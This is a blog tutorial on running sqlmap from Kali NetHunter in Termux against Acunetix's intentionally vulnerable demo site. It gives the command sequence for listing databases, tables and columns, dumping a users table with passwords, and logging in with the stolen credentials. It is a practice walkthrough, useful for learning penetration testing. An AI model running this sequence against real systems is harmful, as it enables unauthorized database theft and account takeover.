Thursday, December 19, 2019

SQL injection penetration testing using sqlmap

SQL injection penetration testing using sqlmap

 SQL injection penetration

    testing using    sqlmap.



sqlmap is an automated Linux and windows based tool to find SQL injection vulnerability.
Sqlmap gives vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables, etc.

Sqlmap is a powerful hacking python tool that works well in all the Linux distros such as parrot, kali Linux, etc.


SQL map is preinstalled in kali Linux if you want to install it manually use GitHub. Simply use command 




git clone https://github.com/sqlmapproject/sqlmap

now sqlmap will download in few minutes..



Sqlmap in linux
Sqlmap in Linux




Sqlmap in kali linux
Sqlmap in Kali Linux



If its not worked install python packages and try again. It works well with python2 in my case.. see the above image..

  Usage

Sqlmap has hell lots of usages, you can see it by using -h and -H command.

now we'll see the practical use of sqlmap using a live example. for this, I am using android because of public demand. using termux.

for this, we'll need termux



we are using kali nethuner in termux for better usage..

simply click on a link to learn it how to install if you still don't know..

now hit kali nethunter in termux and use the command
startkali
ls
cd sqlmap
ls
python2 sqlmap.py

now sqlmap interface will be shown in there.

for the target we are using accunetic vulnhub website for understanding.

the login page looks like this..


accunetix vulnerability login page


now copy the URL page and paste in front of --url in command.

python2 sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1," -o --threads 8 --dbms mysql -dbs

if id is not present there use 1 or crowl it to see pages with id and use URL of it.

now we can see database name accuart is presented over there so we'll further want to see what's in it.

accunetix database
database


database contains tables and columns to feed information in it. that what we going to extract now..

first, we need to see what tables are inside this database to see it use command.

python2 sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1," -o --threads 8 --dbms mysql -dbs --current-db acuart --tables

current-db use for whats in the current database we are seeking here tables which are looks like this..

tables in database
tables in database

now we can see lots are tables over there contain information and credential.
but we need username and password so we'll see what's in table name 'Users'
use this command to see columns of table 'Users'


python2 sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1," -o --threads 8 --dbms mysql -dbs --current-db acuart --tables users --columns

 now the result will show us what columns in table users.

tables and columns in database
tables and columns in database


now as we can see the email, cc,uname, pass, etc

lots of juicy stuff over here..

need to dump it now..

python2 sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1," -o --threads 8 --dbms mysql -dbs --current-db acuart --tables users --dump


this command will dump all credentials in termux. for the sake of security admin use hashes to encrypt it but sqlmap will also decrypt it using a wordlist.

but for us now it is in plaintext.😊

database credentials
database credentials


just see separators very carefully you'll see

uname-test
pass-test

to test it use it in the login page..

user credential
users credential


we got a login successful and success in attack..😉


that it with sqlmap and SQL injection.


I used termux for android because lots of tutorials for other Linux platforms but android users have very little information about how to use it in.. but it works the same in all the platforms and works like charm to find SQL injection...



stay blessed and happy hacking..

Share:

Popular Posts

Loved Our Blog Posts? Subscribe To Get Updates Directly To Your Inbox